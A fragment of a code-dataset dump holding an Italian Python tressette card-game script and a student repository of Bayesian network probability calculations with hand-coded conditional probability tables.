"text": "#coding=utf-8\n\nfrom __future__ import division, print_function\nimport carta\n\nclass Passata(object):\n\n def __init__(self, giocatori, primo_di_mano):\n self.giocatori = giocatori\n#i giocatori devono cominciare in ordine nella lista:\n self.primo_di_mano = primo_di_mano\n self.carte_giocate = [[0 for _ in range(4)] for _ in range(10)]\n#conta le battute:\n self.battuta_in_corso = 0\n#ricorda chi ha conquistato le battute precedenti\n self.vincitori_battute = []\n\n def battuta(self):\n \"\"\"gioca il primo di mano, poi gli altri tre a seguire, ricevendo come\n informazione tutte le carte uscite fino a quel momento.\n le carte giocate vengono salvate in self.carte_giocate a mano a mano\n che escono, per facilitare l'implementazione di\n Giocatore.gioca_carta()\"\"\"\n\n#crea un elemento della lista che conterrà le carte della battuta\n#aggiunge la giocata del primo giocatore\n battuta_in_corso = self.battuta_in_corso\n comanda = self.giocatori[self.primo_di_mano].gioca_carta(self.carte_giocate)\n self.carte_giocate[battuta_in_corso][self.primo_di_mano] = comanda\n for i in range(1, 4):\n num_giocatore = (self.primo_di_mano + i) % 4\n risposta = self.giocatori[num_giocatore].gioca_carta(self.carte_giocate)\n self.carte_giocate[battuta_in_corso][num_giocatore] = risposta\n \"\"\"controlla chi ha preso la battuta\"\"\"\n battuta_completa = self.carte_giocate[battuta_in_corso]\n piglia = carta.comanda_battuta(battuta_completa, self.primo_di_mano)\n comanda = battuta_completa[piglia]\n self.battuta_in_corso += 1\n self.vincitori_battute.append(piglia)\n print(battuta_completa)\n print('comanda il', comanda)\n#chi ha preso comincia la battuta seguente\n self.primo_di_mano = piglia\n print('prende il giocatore', piglia + 1, '\\n')\n\n def punteggi(self):\n \"\"\"Calcola i punti dei giocatori e quindi delle squadre\"\"\"\n punteggi_giocatori = [0 for giocatore in self.giocatori]\n for battuta, vincitore in zip(self.carte_giocate, self.vincitori_battute):\n punti_battuta = sum([c.punti for c in battuta])\n punteggi_giocatori[vincitore] += punti_battuta\n squadre = set([giocatore.squadra for giocatore in self.giocatori])\n punteggi_squadre = [(squadra, 0) for squadra in squadre]\n punteggi_squadre = dict(punteggi_squadre)\n for giocatore, punteggio in zip(self.giocatori, punteggi_giocatori):\n punteggi_squadre[giocatore.squadra] += punteggio\n for squadra in punteggi_squadre:\n punteggi_squadre[squadra] = punteggi_squadre[squadra] // 3\n squadra_tola = self.giocatori[self.vincitori_battute[-1]].squadra\n punteggi_squadre[squadra_tola] += 1\n print(punteggi_squadre[1])\n\n\n \n"
},
{
"alpha_fraction": 0.6527050733566284,
"alphanum_fraction": 0.6998254656791687,
"avg_line_length": 22.875,
"blob_id": "7c5832d73041659e03fa987f88cfa787c4d852c7",
"content_id": "46e845926be5633a0ddee712f88b0c6e3fe6632b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 573,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 24,
"path": "/programma/tressette.py",
"repo_name": "Enucatl/tressette",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#coding=utf-8\n\nfrom __future__ import division, print_function\nimport carta\nimport passata\nimport random\nimport giocatore\n\nmazzo = range(40)\nrandom.shuffle(mazzo)\nmazzo = [carta.Carta(x) for x in mazzo]\n\ngiocatori = [giocatore.Giocatore(mazzo[0:10], 1),\n giocatore.Giocatore(mazzo[10:20], 2),\n giocatore.Giocatore(mazzo[20:30], 1),\n giocatore.Giocatore(mazzo[30:40], 2)]\n\ncartaro = 3\nprimo_di_mano= (cartaro + 1) % 4\npassata = passata.Passata(giocatori, primo_di_mano)\nfor i in range(10):\n passata.battuta()\npassata.punteggi()\n"
}
] | 5 |
sayarghoshroy/Probabilistic_Graphical_Models_Coursework
|
https://github.com/sayarghoshroy/Probabilistic_Graphical_Models_Coursework
|
1ea161480b27c70e81019ec873328646697cc4f5
|
71d52ad5118e4dd4a8b8098b8fad1e8b094f0256
|
60122afd7f69fee602cd16966fe2996b481698fc
|
refs/heads/master
| 2022-11-26T17:17:42.750595 | 2020-07-31T16:47:23 | 2020-07-31T16:47:23 | 256,287,819 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7444933652877808,
"alphanum_fraction": 0.7621145248413086,
"avg_line_length": 31.571428298950195,
"blob_id": "f11737f450ec1002ed1f45daa4b5974c36a3baeb",
"content_id": "a92c5ac5250743f3b5b267dd0d1ff13b1ebfec4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 227,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 7,
"path": "/README.md",
"repo_name": "sayarghoshroy/Probabilistic_Graphical_Models_Coursework",
"src_encoding": "UTF-8",
"text": "# Probabilistic Graphical Models Coursework\n\n## Course Project\n### Bounds for VC Dimension\n- Reference Paper: [A note on bounds for VC dimensions](https://www.stat.washington.edu/jaw/JAW-papers/NR/jaw-vdv.IMSCOLL508v2.pdf)\n\n---"
},
{
"alpha_fraction": 0.4608599841594696,
"alphanum_fraction": 0.5292171835899353,
"avg_line_length": 28.29032325744629,
"blob_id": "1fa6bfa315e832da944ad068e56bb63a8ecd1afc",
"content_id": "195265febbf6ddc3ccf1395211e835d21dcccdc1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 907,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 31,
"path": "/Codes_for_Bayesian_Network/net_B.py",
"repo_name": "sayarghoshroy/Probabilistic_Graphical_Models_Coursework",
"src_encoding": "UTF-8",
"text": "P_eh = {'l': 0.2, 'h': 0.8}\n\nP_oil_eh = {'ll':0.9, 'hl':0.1, 'lh':0.05, 'hh':0.95}\n\nP_bp_oil = {'lh': 0.1, 'nh': 0.4, 'hh': 0.5, 'll': 0.9, 'nl':0.1, 'hl': 0}\n\nP_rt_infeh = {'lll':0.9, 'hll':0.1, 'llh':0.1, 'hlh':0.9, 'lhl':0.1, 'hhl':0.9, 'lhh':0.01, 'hhh':0.99}\n\nP_inf_oileh = {'lll':0.9, 'hll':0.1, 'llh':0.1, 'hlh':0.9, 'lhl':0.1, 'hhl':0.9, 'lhh':0.01, 'hhh':0.99}\n\nsummer = ['l', 'h']\n\nnumer = denom = 0\n\nfor oil in summer:\n\tfor eh in summer:\n\t\tprod = P_rt_infeh['hh'+eh]*P_inf_oileh['h'+oil+eh]*P_bp_oil['n'+oil]*P_oil_eh[oil+eh]*P_eh[eh]\n\t\tnumer += prod\n\nprint(\"Numerator: \" + str(numer))\n\nfor oil in summer:\n\tfor eh in summer:\n\t\tfor inf in summer:\n\t\t\tprod = P_rt_infeh['h'+inf+eh]*P_inf_oileh[inf+oil+eh]*P_bp_oil['n'+oil]*P_oil_eh[oil+eh]*P_eh[eh]\n\t\t\tprint(\"term: \" + str(prod) + \" \" + inf + oil + eh)\n\t\t\tdenom += prod\n\nprint(\"Denominator: \" + str(denom))\n\nprint(\"Result: \" + str(numer / denom))"
},
{
"alpha_fraction": 0.32195845246315,
"alphanum_fraction": 0.4480712115764618,
"avg_line_length": 24.452829360961914,
"blob_id": "16561228b4fb0427e8da7c88d2359f4394e4b2d7",
"content_id": "e0d3321c855f8178710d76b2e2215c9c306015e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1348,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 53,
"path": "/Codes_for_Bayesian_Network/net_A.py",
"repo_name": "sayarghoshroy/Probabilistic_Graphical_Models_Coursework",
"src_encoding": "UTF-8",
"text": "P_a = {'1': 0.01, '0': 0.99}\nP_s = {'1': 0.5, '0': 0.5}\n\nP_t_a = {'11': 0.05, '01': 0.95, '10': 0.01, '00': 0.99}\n\nP_l_s = {'11': 0.1, '01': 0.9, '10': 0.01, '00': 0.99}\n\nP_b_s = {'11': 0.6, '01': 0.4, '10': 0.3, '00': 0.7}\n\nP_x_e = {'11': 0.98, '01': 0.02, '10': 0.05, '00': 0.95}\n\nP_e_tl = {'100': 0, '000': 1, '110': 1, '010': 0, '101': 1, '001': 0, '111':1, '011': 0}\n\nP_d_eb = {'100': 0.1, '000': 0.9, '110': 0.7, '010': 0.3, '101': 0.8, '001': 0.2, '111':0.9, '011': 0.1}\n\nbinary = ['0', '1']\n\nsum = 0\nfor e in binary:\n\tfor b in binary:\n\t\tfor l in binary:\n\t\t\tfor t in binary:\n\t\t\t\tfor s in binary:\n\t\t\t\t\tfor a in binary:\n\t\t\t\t\t\tprod = P_d_eb['1'+e+b] * P_e_tl[e+t+l] * P_b_s[b+s] * P_l_s[l+s] * P_t_a[t+a] * P_a[a] * P_s[s]\n\t\t\t\t\t\tsum += prod\n\nprint(\"P(d = true) = \" + str(sum))\n\nsum = 0\nfor e in binary:\n\tfor b in binary:\n\t\tfor l in binary:\n\t\t\tfor t in binary:\n\t\t\t\tfor s in ['1']:\n\t\t\t\t\tfor a in binary:\n\t\t\t\t\t\tprod = P_d_eb['1'+e+b] * P_e_tl[e+t+l] * P_b_s[b+s] * P_l_s[l+s] * P_t_a[t+a] * P_a[a]\n\t\t\t\t\t\tsum += prod\n\nprint(\"P(d = true | s = true) = \" + str(sum))\n\n\nsum = 0\nfor e in binary:\n\tfor b in binary:\n\t\tfor l in binary:\n\t\t\tfor t in binary:\n\t\t\t\tfor s in ['0']:\n\t\t\t\t\tfor a in binary:\n\t\t\t\t\t\tprod = P_d_eb['1'+e+b] * P_e_tl[e+t+l] * P_b_s[b+s] * P_l_s[l+s] * P_t_a[t+a] * P_a[a]\n\t\t\t\t\t\tsum += prod\n\nprint(\"P(d = true | s = false) = \" + str(sum))"
},
{
"alpha_fraction": 0.36645427346229553,
"alphanum_fraction": 0.4463578462600708,
"avg_line_length": 26.137849807739258,
"blob_id": "3ffb4d9f6360c811f2c03c76067ad51ec9aedad1",
"content_id": "50ded2680f16499d38aa77195dc217985e1522f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11614,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 428,
"path": "/Codes_for_Bayesian_Network/net_from_AI_mini_project/net.py",
"repo_name": "sayarghoshroy/Probabilistic_Graphical_Models_Coursework",
"src_encoding": "UTF-8",
"text": "def D(str):\n\t# CPT Table for Variable D\n\tif(str == '0'):\n\t\treturn 0.1\n\telif(str == '1 or 2'):\n\t\treturn 0.7\n\treturn 0.2\n\ndef Ex(str):\n\t# CPT Table for Variable Ex\n\tif(str == 'True'):\n\t\treturn 0.3\n\treturn 0.7\n\ndef Q(str):\n\t# CPT Table for Variable Q\n\tif(str == '0'):\n\t\treturn 0.6\n\telif(str == '1'):\n\t\treturn 0.3\n\treturn 0.1\n\ndef Ev(str):\n\t# CPT Table for Variable Ev\n\tif(str == 'True'):\n\t\treturn 0.7\n\treturn 0.3\n\ndef Te(str):\n\t# CPT Table for Variable Te\n\tif(str == 'True'):\n\t\treturn 0.75\n\treturn 0.25\n\ndef H(str):\n\t# CPT Table for Variable H\n\tif(str == '0'):\n\t\treturn 0.7\n\telif(str == '1'):\n\t\treturn 0.28\n\treturn 0.02\n\ndef F(tup, str):\n\t# CPT Table for Variable F\n\tif(str == 'Negligible'):\n\t\tif(tup == ('True')):\n\t\t\treturn 0.95\n\t\treturn 0.25\n\n\tif(tup == ('True')):\n\t\treturn 0.05\n\treturn 0.75\n\ndef T(tup, str):\n\t# CPT Table for Variable T\n\tif(str == '< 6 hrs'):\n\t\tif(tup ==('Low', '0')):\n\t\t\treturn 0.6\n\t\tif(tup ==('Low', '1')):\n\t\t\treturn 0.55\n\t\tif(tup ==('Low', '2')):\n\t\t\treturn 0.5\n\t\tif(tup ==('Average', '0')):\n\t\t\treturn 0.85\n\t\tif(tup ==('Average', '1')):\n\t\t\treturn 0.8\n\t\tif(tup ==('Average', '2')):\n\t\t\treturn 0.75\n\t\tif(tup ==('High', '0')):\n\t\t\treturn 0.99\n\t\tif(tup ==('High', '1')):\n\t\t\treturn 0.95\n\t\tif(tup ==('High', '2')):\n\t\t\treturn 0.9\n\n\telif(str == '6 to 12 hrs'):\n\t\tif(tup ==('Low', '0')):\n\t\t\treturn 0.3\n\t\tif(tup ==('Low', '1')):\n\t\t\treturn 0.33\n\t\tif(tup ==('Low', '2')):\n\t\t\treturn 0.35\n\t\tif(tup ==('Average', '0')):\n\t\t\treturn 0.1\n\t\tif(tup ==('Average', '1')):\n\t\t\treturn 0.12\n\t\tif(tup ==('Average', '2')):\n\t\t\treturn 0.15\n\t\tif(tup ==('High', '0')):\n\t\t\treturn 0.009\n\t\tif(tup ==('High', '1')):\n\t\t\treturn 0.04\n\t\tif(tup ==('High', '2')):\n\t\t\treturn 0.08\n\n\tif(tup ==('Low', '0')):\n\t\treturn 0.1\n\tif(tup ==('Low', '1')):\n\t\treturn 0.12\n\tif(tup ==('Low', '2')):\n\t\treturn 0.15\n\tif(tup ==('Average', '0')):\n\t\treturn 0.05\n\tif(tup ==('Average', '1')):\n\t\treturn 0.08\n\tif(tup ==('Average', '2')):\n\t\treturn 0.1\n\tif(tup ==('High', '0')):\n\t\treturn 0.001\n\tif(tup ==('High', '1')):\n\t\treturn 0.01\n\tif(tup ==('High', '2')):\n\t\treturn 0.02\n\ndef B(tup, str):\n\t# CPT Table for Variable B\n\n\tif(str == '1'):\n\t\tif (tup == ('Negligible', '< 6 hrs') ):\n\t\t\treturn 0.1\n\t\tif (tup == ('Negligible', '6 to 12 hrs') ):\n\t\t\treturn 0.3\n\t\tif (tup == ('Negligible', '> 12 hrs') ):\n\t\t\treturn 0.7\n\t\tif (tup == ('Substantial', '< 6 hrs') ):\n\t\t\treturn 0.01\n\t\tif (tup == ('Substantial', '6 to 12 hrs') ):\n\t\t\treturn 0.05\n\t\tif (tup == ('Substantial', '> 12 hrs') ):\n\t\t\treturn 0.1\n\n\tif(str == '2'):\n\t\tif (tup == ('Negligible', '< 6 hrs') ):\n\t\t\treturn 0.2\n\t\tif (tup == ('Negligible', '6 to 12 hrs') ):\n\t\t\treturn 0.3\n\t\tif (tup == ('Negligible', '> 12 hrs') ):\n\t\t\treturn 0.2\n\t\tif (tup == ('Substantial', '< 6 hrs') ):\n\t\t\treturn 0.04\n\t\tif (tup == ('Substantial', '6 to 12 hrs') ):\n\t\t\treturn 0.15\n\t\tif (tup == ('Substantial', '> 12 hrs') ):\n\t\t\treturn 0.3\n\n\tif (tup == ('Negligible', '< 6 hrs') ):\n\t\treturn 0.7\n\tif (tup == ('Negligible', '6 to 12 hrs') ):\n\t\treturn 0.4\n\tif (tup == ('Negligible', '> 12 hrs') ):\n\t\treturn 0.1\n\tif (tup == ('Substantial', '< 6 hrs') ):\n\t\treturn 0.95\n\tif (tup == ('Substantial', '6 to 12 hrs') ):\n\t\treturn 0.8\n\telse:\n\t\treturn 0.6\n\ndef W(tup, str):\n\t# CPT Table for Variable W\n\tif(str == 'Low'):\n\t\tif ( tup == ( '0', 'True', '0', 'True' ) ):\n\t\t\treturn 0.166\n\t\tif ( tup == ( '0', 'True', '0', 'False' ) ):\n\t\t\treturn 0.227\n\t\tif ( tup == ( '0', 'True', '1', 'True' ) ):\n\t\t\treturn 0.141\n\t\tif ( tup == ( '0', 'True', '1', 'False' ) ):\n\t\t\treturn 0.203\n\t\tif ( tup == ( '0', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.110\n\t\tif ( tup == ( '0', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.178\n\t\tif ( tup == ( '0', 'False', '0', 'True' ) ):\n\t\t\treturn 0.289\n\t\tif ( tup == ( '0', 'False', '0', 'False' ) ):\n\t\t\treturn 0.35\n\t\tif ( tup == ( '0', 'False', '1', 'True' ) ):\n\t\t\treturn 0.264\n\t\tif ( tup == ( '0', 'False', '1', 'False' ) ):\n\t\t\treturn 0.325\n\t\tif ( tup == ( '0', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.239\n\t\tif ( tup == ( '0', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.301\n\t\tif ( tup == ( '1 or 2', 'True', '0', 'True' ) ):\n\t\t\treturn 0.129\n\t\tif ( tup == ( '1 or 2', 'True', '0', 'False' ) ):\n\t\t\treturn 0.19\n\t\tif ( tup == ( '1 or 2', 'True', '1', 'True' ) ):\n\t\t\treturn 0.104\n\t\tif ( tup == ( '1 or 2', 'True', '1', 'False' ) ):\n\t\t\treturn 0.166\n\t\tif ( tup == ( '1 or 2', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.08\n\t\tif ( tup == ( '1 or 2', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.141\n\t\tif ( tup == ( '1 or 2', 'False', '0', 'True' ) ):\n\t\t\treturn 0.250\n\t\tif ( tup == ( '1 or 2', 'False', '0', 'False' ) ):\n\t\t\treturn 0.313\n\t\tif ( tup == ( '1 or 2', 'False', '1', 'True' ) ):\n\t\t\treturn 0.227\n\t\tif ( tup == ( '1 or 2', 'False', '1', 'False' ) ):\n\t\t\treturn 0.289\n\t\tif ( tup == ( '1 or 2', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.203\n\t\tif ( tup == ( '1 or 2', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.264\n\t\tif ( tup == ( '> 3', 'True', '0', 'True' ) ):\n\t\t\treturn 0.055\n\t\tif ( tup == ( '> 3', 'True', '0', 'False' ) ):\n\t\t\treturn 0.113\n\t\tif ( tup == ( '> 3', 'True', '1', 'True' ) ):\n\t\t\treturn 0.031\n\t\tif ( tup == ( '> 3', 'True', '1', 'False' ) ):\n\t\t\treturn 0.092\n\t\tif ( tup == ( '> 3', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.006\n\t\tif ( tup == ( '> 3', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.068\n\t\tif ( tup == ( '> 3', 'False', '0', 'True' ) ):\n\t\t\treturn 0.178\n\t\tif ( tup == ( '> 3', 'False', '0', 'False' ) ):\n\t\t\treturn 0.239\n\t\tif ( tup == ( '> 3', 'False', '1', 'True' ) ):\n\t\t\treturn 0.154\n\t\tif ( tup == ( '> 3', 'False', '1', 'False' ) ):\n\t\t\treturn 0.215\n\t\tif ( tup == ( '> 3', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.129\n\t\tif ( tup == ( '> 3', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.19\n\n\tif(str == 'Average'):\n\t\tif ( tup == ( '0', 'True', '0', 'True' ) ):\n\t\t\treturn 0.308\n\t\tif ( tup == ( '0', 'True', '0', 'False' ) ):\n\t\t\treturn 0.422\n\t\tif ( tup == ( '0', 'True', '1', 'True' ) ):\n\t\t\treturn 0.262\n\t\tif ( tup == ( '0', 'True', '1', 'False' ) ):\n\t\t\treturn 0.376\n\t\tif ( tup == ( '0', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.217\n\t\tif ( tup == ( '0', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.331\n\t\tif ( tup == ( '0', 'False', '0', 'True' ) ):\n\t\t\treturn 0.536\n\t\tif ( tup == ( '0', 'False', '0', 'False' ) ):\n\t\t\treturn 0.65\n\t\tif ( tup == ( '0', 'False', '1', 'True' ) ):\n\t\t\treturn 0.49\n\t\tif ( tup == ( '0', 'False', '1', 'False' ) ):\n\t\t\treturn 0.604\n\t\tif ( tup == ( '0', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.445\n\t\tif ( tup == ( '0', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.559\n\t\tif ( tup == ( '1 or 2', 'True', '0', 'True' ) ):\n\t\t\treturn 0.239\n\t\tif ( tup == ( '1 or 2', 'True', '0', 'False' ) ):\n\t\t\treturn 0.354\n\t\tif ( tup == ( '1 or 2', 'True', '1', 'True' ) ):\n\t\t\treturn 0.194\n\t\tif ( tup == ( '1 or 2', 'True', '1', 'False' ) ):\n\t\t\treturn 0.308\n\t\tif ( tup == ( '1 or 2', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.148\n\t\tif ( tup == ( '1 or 2', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.262\n\t\tif ( tup == ( '1 or 2', 'False', '0', 'True' ) ):\n\t\t\treturn 0.468\n\t\tif ( tup == ( '1 or 2', 'False', '0', 'False' ) ):\n\t\t\treturn 0.582\n\t\tif ( tup == ( '1 or 2', 'False', '1', 'True' ) ):\n\t\t\treturn 0.422\n\t\tif ( tup == ( '1 or 2', 'False', '1', 'False' ) ):\n\t\t\treturn 0.536\n\t\tif ( tup == ( '1 or 2', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.376\n\t\tif ( tup == ( '1 or 2', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.49\n\t\tif ( tup == ( '> 3', 'True', '0', 'True' ) ):\n\t\t\treturn 0.103\n\t\tif ( tup == ( '> 3', 'True', '0', 'False' ) ):\n\t\t\treturn 0.217\n\t\tif ( tup == ( '> 3', 'True', '1', 'True' ) ):\n\t\t\treturn 0.057\n\t\tif ( tup == ( '> 3', 'True', '1', 'False' ) ):\n\t\t\treturn 0.171\n\t\tif ( tup == ( '> 3', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.011\n\t\tif ( tup == ( '> 3', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.125\n\t\tif ( tup == ( '> 3', 'False', '0', 'True' ) ):\n\t\t\treturn 0.331\n\t\tif ( tup == ( '> 3', 'False', '0', 'False' ) ):\n\t\t\treturn 0.445\n\t\tif ( tup == ( '> 3', 'False', '1', 'True' ) ):\n\t\t\treturn 0.285\n\t\tif ( tup == ( '> 3', 'False', '1', 'False' ) ):\n\t\t\treturn 0.399\n\t\tif ( tup == ( '> 3', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.239\n\t\tif ( tup == ( '> 3', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.354\n\n\telse:\n\t\tif ( tup == ( '0', 'True', '0', 'True' ) ):\n\t\t\treturn 0.526\n\t\tif ( tup == ( '0', 'True', '0', 'False' ) ):\n\t\t\treturn 0.351\n\t\tif ( tup == ( '0', 'True', '1', 'True' ) ):\n\t\t\treturn 0.596\n\t\tif ( tup == ( '0', 'True', '1', 'False' ) ):\n\t\t\treturn 0.421\n\t\tif ( tup == ( '0', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.667\n\t\tif ( tup == ( '0', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.491\n\t\tif ( tup == ( '0', 'False', '0', 'True' ) ):\n\t\t\treturn 0.175\n\t\tif ( tup == ( '0', 'False', '0', 'False' ) ):\n\t\t\treturn 0\n\t\tif ( tup == ( '0', 'False', '1', 'True' ) ):\n\t\t\treturn 0.246\n\t\tif ( tup == ( '0', 'False', '1', 'False' ) ):\n\t\t\treturn 0.07\n\t\tif ( tup == ( '0', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.316\n\t\tif ( tup == ( '0', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.14\n\t\tif ( tup == ( '1 or 2', 'True', '0', 'True' ) ):\n\t\t\treturn 0.632\n\t\tif ( tup == ( '1 or 2', 'True', '0', 'False' ) ):\n\t\t\treturn 0.456\n\t\tif ( tup == ( '1 or 2', 'True', '1', 'True' ) ):\n\t\t\treturn 0.702\n\t\tif ( tup == ( '1 or 2', 'True', '1', 'False' ) ):\n\t\t\treturn 0.526\n\t\tif ( tup == ( '1 or 2', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.772\n\t\tif ( tup == ( '1 or 2', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.596\n\t\tif ( tup == ( '1 or 2', 'False', '0', 'True' ) ):\n\t\t\treturn 0.281\n\t\tif ( tup == ( '1 or 2', 'False', '0', 'False' ) ):\n\t\t\treturn 0.105\n\t\tif ( tup == ( '1 or 2', 'False', '1', 'True' ) ):\n\t\t\treturn 0.351\n\t\tif ( tup == ( '1 or 2', 'False', '1', 'False' ) ):\n\t\t\treturn 0.175\n\t\tif ( tup == ( '1 or 2', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.421\n\t\tif ( tup == ( '1 or 2', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.246\n\t\tif ( tup == ( '> 3', 'True', '0', 'True' ) ):\n\t\t\treturn 0.842\n\t\tif ( tup == ( '> 3', 'True', '0', 'False' ) ):\n\t\t\treturn 0.667\n\t\tif ( tup == ( '> 3', 'True', '1', 'True' ) ):\n\t\t\treturn 0.912\n\t\tif ( tup == ( '> 3', 'True', '1', 'False' ) ):\n\t\t\treturn 0.737\n\t\tif ( tup == ( '> 3', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.982\n\t\tif ( tup == ( '> 3', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.807\n\t\tif ( tup == ( '> 3', 'False', '0', 'True' ) ):\n\t\t\treturn 0.491\n\t\tif ( tup == ( '> 3', 'False', '0', 'False' ) ):\n\t\t\treturn 0.316\n\t\tif ( tup == ( '> 3', 'False', '1', 'True' ) ):\n\t\t\treturn 0.561\n\t\tif ( tup == ( '> 3', 'False', '1', 'False' ) ):\n\t\t\treturn 0.386\n\t\tif ( tup == ( '> 3', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.632\n\t\telse:\n\t\t\treturn 0.456\n\ndef domain(str):\n\tif(str == 'D'):\n\t\treturn ['0', '1 or 2', '> 3']\n\tif(str == 'Ex'):\n\t\treturn ['True', 'False']\n\tif(str == 'Q'):\n\t\treturn ['0', '1', '> 2']\n\tif(str == 'Ev'):\n\t\treturn ['True', 'False']\n\tif(str == 'Te'):\n\t\treturn ['True', 'False']\n\tif(str == 'W'):\n\t\treturn ['Low', 'Average', 'High']\n\tif(str == 'H'):\n\t\treturn ['0', '1', '2']\n\tif(str == 'F'):\n\t\treturn ['Negligible', 'Substantial']\n\tif(str == 'T'):\n\t\treturn ['< 6 hrs', '6 to 12 hrs', '> 12 hrs']\n\tif(str == 'B'):\n\t\treturn ['1', '2', '3' ]\n\nsumming = 0\nfor b in domain('B'):\n\tfor d in domain('D'):\n\t\tfor ex in domain('Ex'):\n\t\t\tfor q in domain('Q'):\n\t\t\t\tfor ev in domain('Ev'):\n\t\t\t\t\tfor w in domain('W'):\n\t\t\t\t\t\tfor h in domain('H'):\n\t\t\t\t\t\t\tfor t in domain('T'):\n\t\t\t\t\t\t\t\tsumming = summing + (float)(F(('True'), 'Negligible') * Te('True') * D(d) * Ex(ex) * Q(q) * Ev(ev) * B(('Negligible', t), b) * W( (d, ex, q, ev), w) * H(h) * T((w, h), t))\n\nsum_num = 0\nb = '1'\n\nfor d in domain('D'):\n\tfor ex in domain('Ex'):\n\t\tfor q in domain('Q'):\n\t\t\tfor ev in domain('Ev'):\n\t\t\t\tfor w in domain('W'):\n\t\t\t\t\tfor h in domain('H'):\n\t\t\t\t\t\tfor t in domain('T'):\n\t\t\t\t\t\t\tsum_num = sum_num + (float)(F(('True'), 'Negligible') * Te('True') * D(d) * Ex(ex) * Q(q) * Ev(ev) * B(('Negligible', t), b) * W( (d, ex, q, ev), w) * H(h) * T((w, h), t))\n\nprint(\"Required Probability = \", (sum_num / summing))"
}
] | 4 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.